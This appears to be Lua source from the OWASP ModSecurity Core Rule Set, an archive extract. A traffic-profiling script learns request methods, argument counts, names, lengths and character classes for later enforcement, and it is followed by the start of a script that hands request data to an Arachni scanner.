[resource.min_traffic_threshold] Set the resource.min_traffic_threshold as the minimum number of "clean" transactions to profile/inspect before enforcement of the profile begins. [resource.min_pattern_threshold] resource.min_pattern_threshold is the minimum number of times that an individual match should occur in order to include the it into the learned profile ]] MinPatternThreshold = tonumber(m.getvar("RESOURCE.min_pattern_threshold")) MinTrafficThreshold = tonumber(m.getvar("RESOURCE.min_traffic_threshold")) TrafficCounter = m.getvar("RESOURCE.traffic_counter") if TrafficCounter == nil then TrafficCounter = "1" m.setvar("RESOURCE.traffic_counter", TrafficCounter) m.log(4, "Traffic Counter: " ..TrafficCounter.. ".") else TrafficCounter = tonumber(TrafficCounter + 1) m.setvar("RESOURCE.traffic_counter", TrafficCounter) m.log(4, "Traffic Counter: " ..TrafficCounter.. ".") end --[[ Profile Request Method ]] ProfileRequestMethod() --[[ Profile Number of Parameters/ARGS ]] ProfileNumOfArgs() --[[ Profile Parameter Names ]] ProfileArgsNames() --[[ Profile Parameter Lengths ]] ProfileArgsLength() --[[ Profile Parameter Character Class ]] ProfileArgCharClass() if (TrafficCounter == MinTrafficThreshold) then m.setvar("RESOURCE.enforce_re_profile", "1") end m.log(4, "Ending Profile Analyzer Script") return nil end --[[ Begin Profiler Functions ]] function ProfileArgCharClass() local Args = {} Args = m.getvars("ARGS", {"none"}) for k,v in pairs(Args) do name = v["name"]; value = v["value"]; m.log(4, "CharClass Check - Arg Name: " ..name.. " and Value: " ..value.. "."); --[[ Check for Digits Character Class ]] if string.match(value, "^%d+$") then m.log(4, "Parameter " ..name.. " payload matches digit class.") local EnforceArgCharClassDigits = m.getvar("RESOURCE.enforce_charclass_digits") if not (EnforceArgCharClassDigits) then local ArgDigitCounter = m.getvar("RESOURCE." ..name.. "_digit_counter") if not (ArgDigitCounter) then ArgDigitCounter = 1 m.log(4, "Creating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) else ArgDigitCounter = ArgDigitCounter + 1 m.log(4, "Updating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) end if (ArgDigitCounter == MinPatternThreshold) then if not (EnforceArgCharClassDigits) then EnforceArgCharClassDigits = name else EnforceArgCharClassDigits = EnforceArgCharClassDigits .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Digits Enforcement list: " .. EnforceArgCharClassDigits) m.setvar("RESOURCE.enforce_charclass_digits", EnforceArgCharClassDigits) m.setvar("!RESOURCE." .. name .. "_digit_counter", "0") end else local CheckArgCharClassDigits = string.find(EnforceArgCharClassDigits, name) if (CheckArgCharClassDigits) then m.log(4, "Arg Name: " .. name .. " already in Digits Enforcement list.") else local ArgDigitCounter = m.getvar("RESOURCE." ..name.. "_digit_counter") if not (ArgDigitCounter) then ArgDigitCounter = 1 m.log(4, "Creating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) else ArgDigitCounter = ArgDigitCounter + 1 m.log(4, "Updating " .. name .. " Digit Counter: " .. ArgDigitCounter) m.setvar("RESOURCE." .. name .. "_digit_counter", ArgDigitCounter) end if (ArgDigitCounter == MinPatternThreshold) then if not (EnforceArgCharClassDigits) then EnforceArgCharClassDigits = name else EnforceArgCharClassDigits = EnforceArgCharClassDigits .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Digits Enforcement list: " .. EnforceArgCharClassDigits) m.setvar("RESOURCE.enforce_charclass_digits", EnforceArgCharClassDigits) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_digit_counter", "0") end --[[ Check for Email Class ]] elseif string.match(value, "^[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?$") then m.log(4, "Parameter " ..name.. " payload matches email class.") local EnforceArgCharClassEmail = m.getvar("RESOURCE.enforce_charclass_email") if not (EnforceArgCharClassEmail) then local ArgEmailCounter = m.getvar("RESOURCE." ..name.. "_email_counter") if not (ArgEmailCounter) then ArgEmailCounter = 1 m.log(4, "Creating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) else ArgEmailCounter = ArgEmailCounter + 1 m.log(4, "Updating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) end if (ArgEmailCounter == MinPatternThreshold) then if not (EnforceArgCharClassEmail) then EnforceArgCharClassEmail = name else EnforceArgCharClassEmail = EnforceArgCharClassEmail .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Email Enforcement list: " .. EnforceArgCharClassEmail) m.setvar("RESOURCE.enforce_charclass_email", EnforceArgCharClassEmail) end else local CheckArgCharClassEmail = string.find(EnforceArgCharClassEmail, name) if (CheckArgCharClassEmail) then m.log(4, "Arg Name: " .. name .. " already in Email Enforcement list.") else local ArgEmailCounter = m.getvar("RESOURCE." ..name.. "_email_counter") if not (ArgEmailCounter) then ArgEmailCounter = 1 m.log(4, "Creating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) else ArgEmailCounter = ArgEmailCounter + 1 m.log(4, "Updating " .. name .. " Email Counter: " .. ArgEmailCounter) m.setvar("RESOURCE." .. name .. "_email_counter", ArgEmailCounter) end if (ArgEmailCounter == MinPatternThreshold) then if not (EnforceArgCharClassEmail) then EnforceArgCharClassEmail = name else EnforceArgCharClassEmail = EnforceArgCharClassEmail .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Email Enforcement list: " .. EnforceArgCharClassEmail) m.setvar("RESOURCE.enforce_charclass_email", EnforceArgCharClassEmail) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_email_counter", "0") end --[[ Check for URL Class ]] elseif string.match(value, "[A-Za-z]+://[A-Za-z0-9-_]+%.[A-Za-z0-9-_.]+/?") then m.log(4, "Parameter " ..name.. " payload matches url class.") local EnforceArgCharClassUrl = m.getvar("RESOURCE.enforce_charclass_url") if not (EnforceArgCharClassUrl) then local ArgUrlCounter = m.getvar("RESOURCE." ..name.. "_url_counter") if not (ArgUrlCounter) then ArgUrlCounter = 1 m.log(4, "Creating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) else ArgUrlCounter = ArgUrlCounter + 1 m.log(4, "Updating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) end if (ArgUrlCounter == MinPatternThreshold) then if not (EnforceArgCharClassUrl) then EnforceArgCharClassUrl = name else EnforceArgCharClassUrl = EnforceArgCharClassUrl .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Url Enforcement list: " .. EnforceArgCharClassUrl) m.setvar("RESOURCE.enforce_charclass_url", EnforceArgCharClassUrl) end else local CheckArgCharClassUrl = string.find(EnforceArgCharClassUrl, name) if (CheckArgCharClassUrl) then m.log(4, "Arg Name: " .. name .. " already in Url Enforcement list.") else local ArgUrlCounter = m.getvar("RESOURCE." ..name.. "_url_counter") if not (ArgUrlCounter) then ArgUrlCounter = 1 m.log(4, "Creating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) else ArgUrlCounter = ArgUrlCounter + 1 m.log(4, "Updating " .. name .. " Url Counter: " .. ArgUrlCounter) m.setvar("RESOURCE." .. name .. "_url_counter", ArgUrlCounter) end if (ArgUrlCounter == MinPatternThreshold) then if not (EnforceArgCharClassUrl) then EnforceArgCharClassUrl = name else EnforceArgCharClassUrl = EnforceArgCharClassUrl .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Url Enforcement list: " .. EnforceArgCharClassUrl) m.setvar("RESOURCE.enforce_charclass_url", EnforceArgCharClassUrl) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_url_counter", "0") end --[[ Check for Path Class ]] elseif string.match(value, "[-a-zA-Z0-9/._]*/[-a-zA-Z0-9/._]*") then m.log(4, "Parameter " ..name.. " payload matches path class.") local EnforceArgCharClassPath = m.getvar("RESOURCE.enforce_charclass_path") if not (EnforceArgCharClassPath) then local ArgPathCounter = m.getvar("RESOURCE." ..name.. "_path_counter") if not (ArgPathCounter) then ArgPathCounter = 1 m.log(4, "Creating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) else ArgPathCounter = ArgPathCounter + 1 m.log(4, "Updating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) end if (ArgPathCounter == MinPatternThreshold) then if not (EnforceArgCharClassPath) then EnforceArgCharClassPath = name else EnforceArgCharClassPath = EnforceArgCharClassPath .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Path Enforcement list: " .. EnforceArgCharClassPath) m.setvar("RESOURCE.enforce_charclass_path", EnforceArgCharClassPath) end else local CheckArgCharClassPath = string.find(EnforceArgCharClassPath, name) if (CheckArgCharClassPath) then m.log(4, "Arg Name: " .. name .. " already in Path Enforcement list.") else local ArgPathCounter = m.getvar("RESOURCE." ..name.. "_path_counter") if not (ArgPathCounter) then ArgPathCounter = 1 m.log(4, "Creating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) else ArgPathCounter = ArgPathCounter + 1 m.log(4, "Updating " .. name .. " Path Counter: " .. ArgPathCounter) m.setvar("RESOURCE." .. name .. "_path_counter", ArgPathCounter) end if (ArgPathCounter == MinPatternThreshold) then if not (EnforceArgCharClassPath) then EnforceArgCharClassPath = name else EnforceArgCharClassPath = EnforceArgCharClassPath .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Path Enforcement list: " .. EnforceArgCharClassPath) m.setvar("RESOURCE.enforce_charclass_path", EnforceArgCharClassPath) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_path_counter", "0") end --[[ Check for Flag Parameter Class ]] elseif string.match(value, "^$") then m.log(4, "Parameter " ..name.. " payload matches flag parameter class.") local EnforceArgCharClassFlag = m.getvar("RESOURCE.enforce_charclass_flag") if not (EnforceArgCharClassFlag) then local ArgFlagCounter = m.getvar("RESOURCE." ..name.. "_flag_counter") if not (ArgFlagCounter) then ArgFlagCounter = 1 m.log(4, "Creating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) else ArgFlagCounter = ArgFlagCounter + 1 m.log(4, "Updating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) end if (ArgFlagCounter == MinPatternThreshold) then if not (EnforceArgCharClassFlag) then EnforceArgCharClassFlag = name else EnforceArgCharClassFlag = EnforceArgCharClassFlag .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Flag Enforcement list: " .. EnforceArgCharClassFlag) m.setvar("RESOURCE.enforce_charclass_flag", EnforceArgCharClassFlag) end else local CheckArgCharClassFlag = string.find(EnforceArgCharClassFlag, name) if (CheckArgCharClassFlag) then m.log(4, "Arg Name: " .. name .. " already in Flag Enforcement list.") else local ArgFlagCounter = m.getvar("RESOURCE." ..name.. "_flag_counter") if not (ArgFlagCounter) then ArgFlagCounter = 1 m.log(4, "Creating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) else ArgFlagCounter = ArgFlagCounter + 1 m.log(4, "Updating " .. name .. " Flag Counter: " .. ArgFlagCounter) m.setvar("RESOURCE." .. name .. "_flag_counter", ArgFlagCounter) end if (ArgFlagCounter == MinPatternThreshold) then if not (EnforceArgCharClassFlag) then EnforceArgCharClassFlag = name else EnforceArgCharClassFlag = EnforceArgCharClassFlag .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Flag Enforcement list: " .. EnforceArgCharClassFlag) m.setvar("RESOURCE.enforce_charclass_flag", EnforceArgCharClassFlag) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_flag_counter", "0") end --[[ Check for Alpha/Letters Character Class ]] elseif string.match(value, "^%a+$") then m.log(4, "Parameter " ..name.. " payload matches alpha class.") local EnforceArgCharClassAlpha = m.getvar("RESOURCE.enforce_charclass_alphas") if not (EnforceArgCharClassAlpha) then local ArgAlphaCounter = m.getvar("RESOURCE." ..name.. "_alpha_counter") if not (ArgAlphaCounter) then ArgAlphaCounter = 1 m.log(4, "Creating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) else ArgAlphaCounter = ArgAlphaCounter + 1 m.log(4, "Updating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) end if (ArgAlphaCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlpha) then EnforceArgCharClassAlpha = name else EnforceArgCharClassAlpha = EnforceArgCharClassAlpha .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Alpha Enforcement list: " .. EnforceArgCharClassAlpha) m.setvar("RESOURCE.enforce_charclass_alphas", EnforceArgCharClassAlpha) m.setvar("!RESOURCE." .. name .. "_alpha_counter", "0") end else local CheckArgCharClassAlpha = string.find(EnforceArgCharClassAlpha, name) if (CheckArgCharClassAlpha) then m.log(4, "Arg Name: " .. name .. " already in Alpha Enforcement list.") else local ArgAlphaCounter = m.getvar("RESOURCE." ..name.. "_alpha_counter") if not (ArgAlphaCounter) then ArgAlphaCounter = 1 m.log(4, "Creating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) else ArgAlphaCounter = ArgAlphaCounter + 1 m.log(4, "Updating " .. name .. " Alpha Counter: " .. ArgAlphaCounter) m.setvar("RESOURCE." .. name .. "_alpha_counter", ArgAlphaCounter) end if (ArgAlphaCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlpha) then EnforceArgCharClassAlpha = name else EnforceArgCharClassAlpha = EnforceArgCharClassAlpha .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the Alpha Enforcement list: " .. EnforceArgCharClassAlpha) m.setvar("RESOURCE.enforce_charclass_alphas", EnforceArgCharClassAlpha) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_alpha_counter", "0") end --[[ Check for AlphaNumeric Character Class ]] elseif string.match(value, "^%w+$") then m.log(4, "Parameter " ..name.. " payload matches alphanumeric class.") local EnforceArgCharClassAlphaNumeric = m.getvar("RESOURCE.enforce_charclass_alphanumeric") if not (EnforceArgCharClassAlphaNumeric) then local ArgAlphaNumericCounter = m.getvar("RESOURCE." ..name.. "_alphanumeric_counter") if not (ArgAlphaNumericCounter) then ArgAlphaNumericCounter = 1 m.log(4, "Creating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) else ArgAlphaNumericCounter = ArgAlphaNumericCounter + 1 m.log(4, "Updating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) end if (ArgAlphaNumericCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlphaNumeric) then EnforceArgCharClassAlphaNumeric = name else EnforceArgCharClassAlphaNumeric = EnforceArgCharClassAlphaNumeric .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the AlphaNumeric Enforcement list: " .. EnforceArgCharClassAlphaNumeric) m.setvar("RESOURCE.enforce_charclass_alphanumeric", EnforceArgCharClassAlphaNumeric) m.setvar("!RESOURCE." .. name .. "_alphanumeric_counter", "0") end else local CheckArgCharClassAlphaNumeric = string.find(EnforceArgCharClassAlphaNumeric, name) if (CheckArgCharClassAlphaNumeric) then m.log(4, "Arg Name: " .. name .. " already in AlphaNumeric Enforcement list.") else local ArgAlphaNumericCounter = m.getvar("RESOURCE." ..name.. "_alphanumeric_counter") if not (ArgAlphaNumericCounter) then ArgAlphaNumericCounter = 1 m.log(4, "Creating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) else ArgAlphaNumericCounter = ArgAlphaNumericCounter + 1 m.log(4, "Updating " .. name .. " AlphaNumeric Counter: " .. ArgAlphaNumericCounter) m.setvar("RESOURCE." .. name .. "_alphanumeric_counter", ArgAlphaNumericCounter) end if (ArgAlphaNumericCounter == MinPatternThreshold) then if not (EnforceArgCharClassAlphaNumeric) then EnforceArgCharClassAlphaNumeric = name else EnforceArgCharClassAlphaNumeric = EnforceArgCharClassAlphaNumeric .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the AlphaNumeric Enforcement list: " .. EnforceArgCharClassAlphaNumeric) m.setvar("RESOURCE.enforce_charclass_alphanumeric", EnforceArgCharClassAlphaNumeric) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_alphanumeric_counter", "0") end --[[ Check for SafeText Character Class ]] elseif string.match(value, "^[a-zA-Z0-9%s_%.%-]+$") then m.log(4, "Parameter " ..name.. " payload matches safetext class.") local EnforceArgCharClassSafeText = m.getvar("RESOURCE.enforce_charclass_safetext") if not (EnforceArgCharClassSafeText) then local ArgSafeTextCounter = m.getvar("RESOURCE." ..name.. "_safetext_counter") if not (ArgSafeTextCounter) then ArgSafeTextCounter = 1 m.log(4, "Creating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) else ArgSafeTextCounter = ArgSafeTextCounter + 1 m.log(4, "Updating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) end if (ArgSafeTextCounter == MinPatternThreshold) then if not (EnforceArgCharClassSafeText) then EnforceArgCharClassSafeText = name else EnforceArgCharClassSafeText = EnforceArgCharClassSafeText .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the SafeText Enforcement list: " .. EnforceArgCharClassSafeText) m.setvar("RESOURCE.enforce_charclass_safetext", EnforceArgCharClassSafeText) end else local CheckArgCharClassSafeText = string.find(EnforceArgCharClassSafeText, name) if (CheckArgCharClassSafeText) then m.log(4, "Arg Name: " .. name .. " already in SafeText Enforcement list.") else local ArgSafeTextCounter = m.getvar("RESOURCE." ..name.. "_safetext_counter") if not (ArgSafeTextCounter) then ArgSafeTextCounter = 1 m.log(4, "Creating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) else ArgSafeTextCounter = ArgSafeTextCounter + 1 m.log(4, "Updating " .. name .. " SafeText Counter: " .. ArgSafeTextCounter) m.setvar("RESOURCE." .. name .. "_safetext_counter", ArgSafeTextCounter) end if (ArgSafeTextCounter == MinPatternThreshold) then if not (EnforceArgCharClassSafeText) then EnforceArgCharClassSafeText = name else EnforceArgCharClassSafeText = EnforceArgCharClassSafeText .. ", " .. name end m.log(4, "Arg Name: " .. name .. " Reached Pattern Threshold. Adding it to the SafeText Enforcement list: " .. EnforceArgCharClassSafeText) m.setvar("RESOURCE.enforce_charclass_safetext", EnforceArgCharClassSafeText) end end end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE." .. name .. "_safetext_counter", "0") end end end end function ProfileArgsLength() local ArgsLength = {} ArgsLength = m.getvars("ARGS", {"none", "length"}) for k,v in pairs(ArgsLength) do name = v["name"]; value = v["value"]; m.log(4, "Arg Name: " ..name.. " and Length: " ..value.. "."); local EnforceArgLength = m.getvar("RESOURCE.enforce_" ..name .. "_length") if EnforceArgsLength ~= nil then local CheckArgsLength = string.find(EnforceArgLength, value) if (CheckArgsLength) then m.log(4, "Arg Name: " .. name .. " with Length: :" ..value.. " already in Enforcement list.") else local ArgLengthCounter = m.getvar("RESOURCE." .. name .. "_length_" ..value.. "_counter") if not (ArgLengthCounter) then ArgLengthCounter = 1 m.log(4, "Creating " .. name .. " Length " ..value.. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) else ArgLengthCounter = ArgLengthCounter + 1 m.log(4, "Increasing " .. name .. " Length " .. value .. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) end if (ArgLengthCounter == MinPatternThreshold) then if not (EnforceArgLength) then EnforceArgLength = value else EnforceArgLength = EnforceArgLength .. ", " .. value end m.log(4, "Arg Name: " .. name .. " with Length: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgLength) m.setvar("RESOURCE.enforce_" ..name .. "_length", EnforceArgLength) end end else local ArgLengthCounter = m.getvar("RESOURCE." .. name .. "_length_" ..value.. "_counter") if not (ArgLengthCounter) then ArgLengthCounter = 1 m.log(4, "Creating " .. name .. " Length " ..value.. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) else ArgLengthCounter = ArgLengthCounter + 1 m.log(4, "Increasing " .. name .. " Length " .. value .. " Counter: " .. ArgLengthCounter) m.setvar("RESOURCE." .. name .. "_length_" ..value.. "_counter", ArgLengthCounter) end if (ArgLengthCounter == MinPatternThreshold) then if not (EnforceArgLength) then EnforceArgLength = value else EnforceArgLength = EnforceArgLength .. ", " .. value end m.log(4, "Arg Name: " .. name .. " with Length: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgLength) m.setvar("RESOURCE.enforce_" ..name.. "_length", EnforceArgLength) end end if (TrafficCounter == MinTrafficThreshold) then i=1 length_of_arg={} for num in string.gmatch(EnforceArgLength, "%d+") do length_of_arg[i]=num;i=i+1; end local MinArgLength = math.min(unpack(length_of_arg)) m.setvar("RESOURCE." .. name .. "_length_min", MinArgLength) local MaxArgLength = math.max(unpack(length_of_arg)) m.setvar("RESOURCE." .. name .. "_length_max", MaxArgLength) m.log(4, "Min Length of " .. name .. ": " ..MinArgLength.. " and Max Length: " ..MaxArgLength.. ".") m.setvar("!RESOURCE." .. name .. "_length_" ..value.. "_counter", "0") end end end function ProfileArgsNames() local ArgsNames = {} ArgsNames = m.getvars("ARGS_NAMES", {"none"}) local EnforceArgsNames = m.getvar("RESOURCE.enforce_args_names") for k,v in pairs(ArgsNames) do name = v["name"]; value = v["value"]; m.log(4, "ArgsName: " ..value.. "."); if EnforceArgsNames ~= nil then local CheckArgsNames = string.find(EnforceArgsNames, value) if (CheckArgsNames) then m.log(4, "Arg Name: " .. value .. " already in Enforcement list.") else local ArgsNamesCounter = m.getvar("RESOURCE.args_names_counter_" .. value) if not (ArgsNamesCounter) then ArgsNamesCounter = 1 m.log(4, "Creating " .. value .. " Pattern Score: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) else ArgsNamesCounter = ArgsNamesCounter + 1 m.log(4, "Increasing " .. value .. " Pattern Score to: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) end if (ArgsNamesCounter == MinPatternThreshold) then if not (EnforceArgsNames) then EnforceArgsNames = value else EnforceArgsNames = EnforceArgsNames .. ", " .. value end m.log(4, "Args Names: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgsNames) m.setvar("RESOURCE.enforce_args_names", EnforceArgsNames) m.setvar("!RESOURCE.args_names_counter_" .. value, "0") end end else local ArgsNamesCounter = m.getvar("RESOURCE.args_names_counter_" .. value) if not (ArgsNamesCounter) then ArgsNamesCounter = 1 m.log(4, "Creating " .. value .. " Pattern Score: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) else ArgsNamesCounter = ArgsNamesCounter + 1 m.log(4, "Increasing " .. value .. " Pattern Score to: " .. ArgsNamesCounter) m.setvar("RESOURCE.args_names_counter_" .. value, ArgsNamesCounter) end if (ArgsNamesCounter == MinPatternThreshold) then if not (EnforceArgsNames) then EnforceArgsNames = value else EnforceArgsNames = EnforceArgsNames .. ", " .. value end m.log(4, "Args Names: " .. value .. " Reached Pattern Threshold. Adding it to the Enforcement list: " .. EnforceArgsNames) m.setvar("RESOURCE.enforce_args_names", EnforceArgsNames) m.setvar("!RESOURCE.args_names_counter_" .. value, "0") end end end end function ProfileRequestMethod() local RequestMethod = m.getvar("REQUEST_METHOD", {"none"}) local EnforceRequestMethods = m.getvar("RESOURCE.enforce_request_methods") if EnforceRequestMethods ~= nil then local CheckEnforceMethods = string.find(EnforceRequestMethods, RequestMethod) if (CheckEnforceMethods) then m.log(4, "Request Method " .. RequestMethod .. " already in Enforcement List.") end end local RequestMethodCounter = m.getvar("RESOURCE.request_method_counter_" .. RequestMethod) if not (RequestMethodCounter) then RequestMethodCounter = 1 m.log(4, "Creating " .. RequestMethod .. " Pattern Score: " .. RequestMethodCounter) m.setvar("RESOURCE.request_method_counter_" .. RequestMethod, RequestMethodCounter) else RequestMethodCounter = RequestMethodCounter + 1 m.log(4, "Increasing " .. RequestMethod .. " Pattern Score to: " .. RequestMethodCounter) m.setvar("RESOURCE.request_method_counter_" .. RequestMethod, RequestMethodCounter) end if (RequestMethodCounter == MinPatternThreshold) then if not (EnforceRequestMethods) then EnforceRequestMethods = RequestMethod else EnforceRequestMethods = EnforceRequestMethods .. ", " .. RequestMethod end m.log(4, "Request Method Reached Pattern Threshold. Adding it to the EnforceRequestMethods list: " .. EnforceRequestMethods) m.setvar("RESOURCE.enforce_request_methods", EnforceRequestMethods) end if (TrafficCounter == MinTrafficThreshold) then m.setvar("!RESOURCE.request_method_counter_" .. RequestMethod, "0") end end function ProfileNumOfArgs() local ARGS = {} local ARGS = m.getvars("ARGS", {"none"}) local NumOfArgs = tonumber(#ARGS) local EnforceNumOfArgs = m.getvar("RESOURCE.enforce_num_of_args") if EnforceNumOfArgs ~= nil then local CheckNumOfArgs = string.find(EnforceNumOfArgs, NumOfArgs) if (CheckNumOfArgs) then m.log(4, "ARGS #: " .. NumOfArgs .. " already in Enforcement List.") end end local NumOfArgsCounter = m.getvar("RESOURCE.NumOfArgs_counter_" .. NumOfArgs) if not (NumOfArgsCounter) then NumOfArgsCounter = 1 m.log(4, "Current # of ARGS: " ..NumOfArgs.. " has not been previously seen.") m.log(4, "Creating " .. NumOfArgs .. " Pattern Score to: " .. NumOfArgsCounter) m.setvar("RESOURCE.NumOfArgs_counter_" .. NumOfArgs, NumOfArgsCounter) else NumOfArgsCounter = NumOfArgsCounter + 1 m.log(4, "Current # of ARGS: " ..NumOfArgs.. " has been previously seen.") m.log(4, "Increasing " .. NumOfArgs .. " Pattern Score to: " .. NumOfArgsCounter) m.setvar("RESOURCE.NumOfArgs_counter_" .. NumOfArgs, NumOfArgsCounter) end if (NumOfArgsCounter == MinPatternThreshold) then if not (EnforceNumOfArgs) then EnforceNumOfArgs = NumOfArgs else EnforceNumOfArgs = EnforceNumOfArgs.. ", " ..NumOfArgs end m.log(4, "NumOfArgs Reached Pattern Threshold. Adding it to the EnforceRequestMethods list: " .. EnforceNumOfArgs) m.setvar("RESOURCE.enforce_num_of_args", EnforceNumOfArgs) end if (TrafficCounter == MinTrafficThreshold) then i=1 num_of_args={} for num in string.gmatch(EnforceNumOfArgs, "%d+") do num_of_args[i]=num;i=i+1; end local MinNumOfArgs = math.min(unpack(num_of_args)) m.setvar("RESOURCE.MinNumOfArgs", MinNumOfArgs) local MaxNumOfArgs = math.max(unpack(num_of_args)) m.setvar("RESOURCE.MaxNumOfArgs", MaxNumOfArgs) m.log(4, "Min # of ARGS: " ..MinNumOfArgs.. " and Max # of ARGS: " ..MaxNumOfArgs.. ".") m.setvar("!RESOURCE.NumOfArgs_counter_" .. NumOfArgs, "0") end end ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/arachni_integration.lua��������������������������������0000775�0000000�0000000�00000015251�12164572564�0026027�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������-- -- Include Arachni RPC client code -- require "client" -- -- Call main ModSecurity Lua function -- function main() -- -- Set the remote Arachni RPC host -- arachni_host = '192.168.168.128' -- -- Extract Request Data -- host = m.getvar("REQUEST_HEADERS.host") m.log(4, "Arachni: Host: " .. host) request_filename = m.getvar("REQUEST_FILENAME") m.log(4, "Arachni: Filename: " .. request_filename) url_to_scan = "http://" .. host .. request_filename m.log(4, "Arachni: URL to scan is: " .. url_to_scan) request_method = m.getvar("REQUEST_METHOD") m.log(4, "Arachni: Request Method is: " .. request_method) -- -- Convert ModSecurity ARGS data into a local table called args -- ARGS = {} ARGS = m.getvars("ARGS") args = 